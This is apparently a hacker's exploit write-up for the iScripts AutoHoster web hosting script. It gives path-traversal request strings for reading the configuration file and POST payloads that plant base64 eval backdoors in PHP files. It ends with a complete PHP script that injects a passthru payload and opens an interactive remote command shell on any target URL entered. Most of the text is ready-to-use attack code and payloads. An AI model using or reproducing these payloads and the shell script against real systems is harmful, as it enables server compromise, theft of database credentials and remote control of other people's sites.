probably injected by the Guy who nulled the script (thank u any way ;p)
$filename = urldecode($_GET['fname']);
header("content-disposition:attachment;filename=$filename");
readfile($filename)
no need to cancel any thing , just beat it bro ;)
[+] Exploit : /admin/downloadfile.php?fname=../includes/config.php
/support/admin/csvdownload.php
$filename="../csvfiles/".addslashes($_GET["id"]).".txt";
header('Content-Description: File Transfer');
header('Content-Type: application/force-download');
header('Content-Length: ' . filesize($filename));
header('Content-Disposition: attachment; filename=' . basename($filename));
readfile($filename);
[+] Exploit : /support/admin/csvdownload.php?id=../../includes/config.php%00
IV.Directory tr. vuln
/support/parser/main_smtp.php
^
Just light sandwitch before the fatty food :))
V.PHP Code Injection Vuln.
Here come the King :D
/setup/TLDSetup.php
$tldselected = $HTTP_POST_VARS[ "tldselect" ];
$tldcount = count ($tldselected);
for ($j = 0; $j < $tldcount; $j++)
{
$tldList .= "\n";
$tldHoldList .= "\$" . str_replace(".", "", $tldselected[$j]) . "= 1;\n";
}
//set up TLD list
if ($HTTP_POST_VARS[ "tldsetup" ] == 1 or $HTTP_POST_VARS[ "original" ] == 1) {
$tldfile = fopen("./tldListOne.php", "w");
fwrite($tldfile, "");
fclose($tldfile);
$tldHoldfile = fopen("./tldHoldList.php", "w");
fwrite($tldHoldfile, "");
fclose($tldHoldfile);
}
oOps , what should we do yar?
so simple :)
just post these parameters to /setup/TLDSetup.php
tldsetup=1&tldselect[]=faris"){eval(base64_decode($_REQUEST[fa]));}elseif ($cTld=="lame&x=49&y=13
Damn simple :)
now just go to
/setup/tldListOne.php
Enter ur base64 php code as value for the parameter fa
Example
post parameter : fa=cGhwaW5mbygpOw==
this will eval phpinfo(); , u can replace it by fopening ur own php file
It's working , But magic_quotes_gpc will fu#* it up :(
Need cleaner file???
then post these parameters at : /setup/TLDSetup.php
Post : tldsetup=1&tldselect[]=faris=1337;eval(base64_decode($_REQUEST[fa]));$junk&x=49&y=13
Now ur eval code can be executed at /setup/tldHoldList.php
That's much better , huh?
No quotes , let magic_quotes_gpc suffer ;)
/websitebuilder/createcustom.php
if ($_POST["btnSubmit"] == "Create Custom Form") {
$message = "";
$txtEmailAddress = $_POST["txtEmailAddress"];//the form will be mailed to this email address on submission
$txtPageName = $_POST["txtPageName"];//the actual page name
$txtPageDisplayName = $_POST["txtPageDisplayName"];//for display in links
$txtPageHeading = $_POST["txtPageHeading"];//the heading of the page
$formelements = $_POST["formelements"];//holds the form elements to be embedded in the page
$formstart = "
" . $txtPageHeading . "
";
$formend = "
";
$formtext = $formstart . $formelements . $formend;
if ($message != "") {
$message = " Please correct the following errors to continue!" . $message;
}
if ($message == "") {//if no error, proceed with creating page, inserting to database etc
$sql = "SELECT sm.vlinks, sm.vsub_sitelinks, tm.vlink_separator,tm.vsublink_separator,tm.vlink_type,tm.vsublink_type FROM " . $sitemaster . " sm INNER JOIN ".TABLE_PREFIX."template_mast tm ON sm.ntemplate_id = tm.ntemplate_mast ";
$sql .= " WHERE sm." . $siteidfield . " = '" . addslashes($siteid) . "'";
// echo $sql;
$res = mysql_query($sql);
if (mysql_num_rows($res) != 0) {
$row = mysql_fetch_array($res);
$links = $row["vlinks"];
$sublinks = $row["vsub_sitelinks"];
$linkseparator = $row["vlink_separator"];
$sublinkseparator = $row["vsublink_separator"];
$linktype = $row["vlink_type"];
$sublinktype = $row["vsublink_type"];
$pagelink = "" . $txtPageDisplayName . "";
if ($linktype == "horizontal") {
$newlink = $links . $linkseparator . $pagelink;
} else if ($linktype == "vertical") {
$newlink = $links . $linkseparator . $pagelink . " ";
}
if ($sublinktype == "horizontal") {
$newsublink = $sublinks . $sublinkseparator . $pagelink;
} else if ($sublinktype == "vertical") {
$newsublink = $sublinks . $sublinkseparator . $pagelink . " ";
}
if ($links != "") {
$sql = "UPDATE " . $sitemaster . " SET vlinks = '" . addslashes($newlink) . "', vsub_sitelinks='" . addslashes($newsublink) . "' WHERE " . $siteidfield . " = '" . addslashes($siteid) . "' ";
mysql_query($sql);//adding links to database
$pagename = $txtPageDisplayName;
$filename = $txtPageName;
$pagetitle = $txtPageDisplayName;
$pagetype = "custom";
$type = "simple";
$sql2 = "INSERT INTO " . $sitepagetable . "(" . $siteidfield . ", vpage_name,vpage_title,vpage_type,vtype) VALUES ('" . addslashes($siteid) . "','" . addslashes($pagename) . "','" . addslashes($pagetitle) . "','" . addslashes($pagetype) . "','" . addslashes($type) . "') ";
mysql_query($sql2); //adding the new page to database
$newfilename = $sitefoldername . "/" . $filename;
if ($sitepagesfoldername != "") {//if it is a temp site(not completed), then create a file in the sitepages folder also
$newsitepagefilename = $sitepagesfoldername . "/" . $filename;
$fp1 = fopen($newsitepagefilename, "w+");
fwrite($fp1, $formtext);
fclose($fp1);
}
So , all we need is valid authorized siteid :)
it's simple
Make new site
Go to Editing You site
Link will be like : editsitepageoption.php?type=new&actiontype=editsite&templateid=51&tempsiteid=1
tempsiteid=1 > that's what we need
now time for injection :)
Go to : websitebuilder/createcustom.php
Post parameters : siteid=1&btnSubmit=Create Custom Form&txtPageName=faris.php&formelements=
Damn obvious , hah ;)
Injected file is located at : /websitebuilder/workarea/tempsites/1/faris.php
Well ,
this fool wasted me abt 80 mins :|
*/
print "\n+-----------------------------+\n";
print "| iScripts AutoHoster |\n";
print "| PHP Code injection By i-Hmx |\n";
print "| n0p1337@gmail.com |\n";
print "| sec4ever.com , 1337s.cc |\n";
print "+-----------------------------+\n";
echo "\n| Enter Target [http://SITE.COM/PATH/] # ";
$target=trim(fgets(STDIN));
function kastr($string, $start, $end){
$string = " ".$string;
$ini = strpos($string,$start);
if ($ini == 0) return "";
$ini += strlen($start);
$len = strpos($string,$end,$ini) - $ini;
return substr($string,$ini,$len);
}
function faget($url,$post){
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_POSTFIELDS,$post);
curl_setopt($curl, CURLOPT_COOKIEFILE, '/');
curl_setopt($curl, CURLOPT_COOKIEJAR, '/');
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
curl_setopt($curl, CURLOPT_HEADER, false);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
echo "\n| Injecting Payload\n";
faget($target."/setup/TLDSetup.php/",'tldsetup=1&tldselect[]=faris=1337;passthru(base64_decode($_REQUEST[fa]));$junk&x=49&y=13');
if (!preg_match("/passthru()/", faget($target."/setup/tldHoldList.php", "")))
{
die("\n[-] Exploit Failed\n");
}
$myh=kastr($target,"//","/");
print "| sec4ever shell online\n";
while(1)
{
print "\ni-Hmx@$myh# ";
$fa=trim(fgets(STDIN));
if($fa=="exit")
{
die("\n[*] Terminating\n");
}
$fax=base64_encode($fa);
$fadata = faget($target."/setup/tldHoldList.php?fa=$fax","");
print $fadata;
}
/*
Msg for *** ******
Don't sell what's not belonging to you :)
have a good day
*/
?>